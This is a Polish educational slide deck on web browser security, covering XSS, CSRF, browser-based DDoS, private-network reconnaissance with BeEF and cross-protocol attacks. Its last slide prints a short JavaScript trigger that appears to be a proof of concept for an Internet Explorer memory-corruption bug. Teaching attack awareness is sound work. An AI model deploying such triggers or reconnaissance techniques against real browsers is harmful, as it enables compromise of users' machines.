Wstęp do bepieczeństwa przeglądarek internetowych Poznaj swojego wroga

Co przeglądarka może zrobić dla Ciebie  Renderować „zwykłe” dokumenty - HTML/XHTML/XML/TEXT/SVG...  Wraz ze statycznymi (CSS, IMAGES)  Oraz dynamicznymi zasobami (JavaScript)  Uruchamiać wtyczki (Flash, Java, Silverlight, ActiveX)  Obsługuje komunikację sieciową, samodzielnie lub przez wtyczki  Nie tylko protokół HTTP: »DNS, TLS, FTP, FILE, RTSP (real time streaming protocol)

Kiedy spoglądasz w otchłań ona również na Ciebie spogląda Model bezpieczeństwa przeglądarki

XSS i CSRF - wprowadzenie  XSS - Cross-site scripting »„Zły” kod wykonuje się w Twojej przeglądarce, w kontekście domeny do której został wstrzyknięty »Odmiana trwała lub „odbita” (persistent, reflected) + DOM »Zwykle w kontekście kradzieży sesji (ciastek) – mylące!  CSRF – Cross-site request forgery »Ma na celu wykonanie operacji przez nieświadomego użytkownika (przeglądarkę)

XSS i CSRF - przykłady  XSS »Samy („wirus” XSS, myspace, rok 2006) »Tweetdeck XSS („wirus” XSS, rok 2014)  CSRF »10 Marca 2015 Facebook login bug lets attackers hijack accounts on Mashable, other sites »13 Marca 2015 Over a million WordPress websites at risk because of flaw in popular SEO plug-in

A co ty możesz zrobić dla swojej przeglądarki?  Wydobywać bitcoin’y  Zostać jej bezmyślnym sługą  Pomóc Anonimowym w ich atakach (DDoS)  Udostępnić jej swoją kamerę i mikrofon  Poważna sprawa »All your networkz are belong to us »Ataki „Cross protocol” »Czy przeglądarki mają dziury?

Czy moja przeglądarka nie powinna mnie chronić przed takimi atakami?  „Same-origin policy” w sumie nie jest tak restrykcyjna »Odpowiedź w sumie czasami to jest całkiem dostępna - „statyczne” zasoby: obrazki, javascript, css, JSONP »Odpowiedź niedostępna: GET - przekierowanie do niepowiązanej domeny, POST – wysłanie formularza do niepowiązanej domeny »To nie wszystko - GET HEAD POST PUT DELETE TRACE OPTIONS CONNECT PATCH  „Zabezpieczenia” przeciwko XSS  Dziury w przeglądarkach  Aplikacje projektowane w sposób wymuszający potencjalnie niebezpieczne technologie

No i mamy jeszcze wtyczki - Flash

JVM

Bitcoins! 

Bezmyślny sługa  Odwiedzenie strony internetowej to zaproszenie do wykonania kodu na Twoim komputerze  Przeglądarka nie „rozumie” kodu, po prostu go wykonuje  Mogę zjeść Twojego żymloka? »Kod, do pewnego stopnia, steruje ruchem sieciowym »Aplikacja (w niektórych przypadkach) może mieć dostęp do informacji zwrotnej.  XSS to nie tylko ataki na autoryzację

DDoS  Twoja przeglądarka zrobi wszystko jeśli tylko ładnie ją poprosić  Persistent XSS na stronach z dużą ilością odwiedzin 03 Apr 2014: ddos-zombies.html Yesterday we mitigated a unique application layer DDoS attack against one of our clients. The attack was carried out using traffic hijacking techniques, which flooded our client with over 20 million GET requests originating from the browsers of over 22,000 Internet users - all turned into unwilling accomplices by the offender.

Mic & camera  Jeżeli wyrazisz zgodę na to żeby domena uzyskała dostęp do Twojej kamery to przeglądarka nie zapyta drugi raz

Poważna sprawa – sieci prywatne printers-doomed-encryption/

Sieci prywatne, rekonesans i atak  BeEF albo szkrzeszowiec/private_net_discovery/blob/master/fun1.html szkrzeszowiec/private_net_discovery/blob/master/fun1.html  Javascript ping  Wykrywanie aplikacji i sprzętu za pomocą statycznych zasobów  Wykonywanie exploita – np: integracja BeEF i Metasploit

Cross protocol  Co może się stać jeśli wyślemy komendy FTP za pomocą formularza HTTP? DEMO

Zaktualizowana przeglądarka jest bezpieczna, prawda?  At Pwn2Own 2014, French security firm VUPEN won a total of $400,000— the highest payout to a single competitor to date—after successfully exploiting fully updated Internet Explorer 11, Adobe Reader XI, Google Chrome, Adobe Flash, and Mozilla Firefox on a 64-bit version of Windows 8.1. The company used a total of 11 distinct zero-day vulnerabilities. In contrast to the 2012 competition, VUPEN agreed to report all exploited vulnerabilities to the affected vendors (including Google) to allow them fix the exploits.  Liang Chen of Keen Team and Zeguang Zhao of team509 were successful at exploiting Apple Safari on Mac OS X Mavericks and Adobe Flash on Windows 8.1. They collected $140,000 in prize money.  Sebastian Apelt and Andreas Schmidt successfully attacked Internet Explorer 11 on Windows 8.1 to win $100,000. Jüri Aedla, Mariusz Mlynski, and George Hotz each independently exploited Mozilla Firefox, winning $50,000 each.

Jak mógłby wyglądać przykładowy exploit przeglądarki?

Tak 11.html

Albo tak function trigger() { var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); document.body.appendChild(id_0); document.body.appendChild(id_1); id_1.applyElement(id_0); id_0.onlosecapture=function(e) { document.write(""); } id_0['outerText']=""; id_0.setCapture(); id_1.setCapture(); } window.onload = function() { trigger(); }

 Pytania?